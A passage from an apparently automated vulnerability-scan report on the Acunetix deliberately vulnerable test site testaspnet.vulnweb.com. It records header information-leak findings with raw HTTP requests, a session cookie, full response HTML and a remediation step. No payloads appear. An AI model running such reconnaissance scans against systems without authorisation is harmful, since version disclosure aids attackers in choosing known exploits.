          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a>
          						<DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        7. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        8. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
